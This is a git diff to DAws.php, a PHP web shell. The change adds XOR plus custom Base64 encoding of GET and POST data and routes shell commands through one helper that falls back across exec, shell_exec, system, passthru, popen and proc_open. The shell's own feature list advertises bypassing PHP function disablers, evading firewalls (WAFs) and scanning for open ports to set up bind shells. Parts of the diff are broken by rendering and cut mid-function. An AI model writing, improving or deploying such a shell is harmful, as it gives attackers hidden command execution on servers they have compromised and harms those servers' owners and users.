diff --git a/DAws.php b/DAws.php index a6389d2..ce44274 100644 --- a/DAws.php +++ b/DAws.php @@ -75,6 +75,129 @@ function generateRandomString($length = 10) $_SESSION['key'] = generateRandomString(); } +$base64ids = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "+", "/"); + +function binToDec($string) +{ + $decimal = ""; + for($i = 0; $i @@ -362,7 +485,7 @@ function showDiv()
  • There's multiple things that makes DAws better than every Web Shell out there:
    1. Bypasses Disablers; DAws isn't just about using a particular function to get the job done, it uses up to 6 functions if needed, for example, if `shell_exec` was disabled it would automatically use `exec` or `passthru` or `system` or `popen` or `proc_open` instead, same for Downloading a File from a Link, if `Curl` was disabled then `file_get_content` is used instead and this Feature is widely used in every section and fucntion of the shell.
      2. -
    2. Automatic Random Encoding; DAws randomly encodes automatically most of your GET and POST data using Java Script or PHP which will allow your shell to Bypass pretty much every WAF out there.
      3. +
    3. Automatic Encoding; DAws randomly and automatically encodes most of your GET and POST data using XOR(Randomized key for every session) + Base64(We created our own Base64 encoding functions instead of using the PHP ones to bypass Disablers) which will allow your shell to Bypass pretty much every WAF out there.
    4. Advanced File Manager; DAws's File Manager contains everything a File Manager needs and even more but the main Feature is that everything is dynamically printed; the permissions of every File and Folder are checked, now, the functions that can be used will be available based on these permissions, this will save time and make life much easier.
    5. Tools: DAws holds bunch of useful tools such as "bpscan" which can identify useable and unblocked ports on the server within few minutes which can later on allow you to go for a bind shell for example.
    6. Everything that can't be used at all will be simply removed so Users do not have to waste their time. We're for example mentioning the execution of c++ scripts when there's no c++ compilers on the server(DAws would have checked for multiple compilers in the first place) in this case, the function would be automatically removed and the User would know.
      7. @@ -524,7 +647,7 @@ function showDiv() echo " Version - + N/A "; } @@ -547,7 +670,7 @@ function showDiv() echo " Current User - + N/A "; } @@ -1070,6 +1193,11 @@ function evalRel($command) echo $stdout; } } + else + { + echo "Fail"; + return False; + } } @@ -1398,52 +1526,7 @@ function findSmallest($i, $end, $data) } else { - if ($exec == True) - { - exec("zip -r $archiveName $archiveName"); - } - else if($shell_exec == True) - { - shell_exec("zip -r $archiveName $archiveName"); - } - else if($system == True) - { - system("zip -r $archiveName $archiveName"); - } - else if($passthru == True) - { - passthru("zip -r $archiveName $archiveName"); - } - else if($popen == true) - { - $pid = popen("zip -r $archiveName $archiveName","r"); - pclose($pid); - } - else if($proc_open == true) - { - $process = proc_open( - "zip -r $archiveName $archiveName", - array( - 0 => array("pipe", "r"), - 1 => array("pipe", "w"), - 2 => array("pipe", "w"), - ), - $pipes - ); - - if ($process !== false) - { - fclose($pipes[1]); - fclose($pipes[2]); - proc_close($process); - } - else - { - echo "

      Can't Zip because 'exec', 'shell_exec', 'system' and 'passthru' are Disabled.

      "; - $zipFail = True; - } - } - else + if(evalRel("zip -r $archiveName $archiveName")==False) { echo "

      Can't Zip because 'exec', 'shell_exec', 'system' and 'passthru' are Disabled.

      "; $zipFail = True; @@ -2897,73 +2980,7 @@ function zipWindows($zip_location, $folder) file_put_contents("zipFolder.vbs", $code); - -if ($shell_exec == True) -{ - echo shell_exec("cscript //nologo zipFolder.vbs"); -} -else if($exec == True) -{ - echo exec("cscript //nologo zipFolder.vbs"); -} -else if($passthru == True) -{ - passthru("cscript //nologo zipFolder.vbs"); -} -else if($system == True) -{ - system("cscript //nologo zipFolder.vbs"); -} -else if($popen == true) -{ - $pid = popen("cscript //nologo zipFolder.vbs","r"); - while(!feof($pid)) - { - echo fread($pid, 256); - flush(); - ob_flush(); - usleep(100000); - } - pclose($pid); -} -else if($proc_open == true) -{ - $process = proc_open( - "cscript //nologo zipFolder.vbs", - array( - 0 => array("pipe", "r"), - 1 => array("pipe", "w"), - 2 => array("pipe", "w"), - ), - $pipes - ); - - if ($process !== false) - { - $stdout = stream_get_contents($pipes[1]); - $stderr = stream_get_contents($pipes[2]); - fclose($pipes[1]); - fclose($pipes[2]); - proc_close($process); - - if ($stderr != "") - { - echo $stderr; - } - else - { - echo $stdout; - } - } - else - { - echo "Fail"; - } -} -else -{ - echo "Fail"; -} +evalRel("cscript //nologo zipFolder.vbs"); } ?>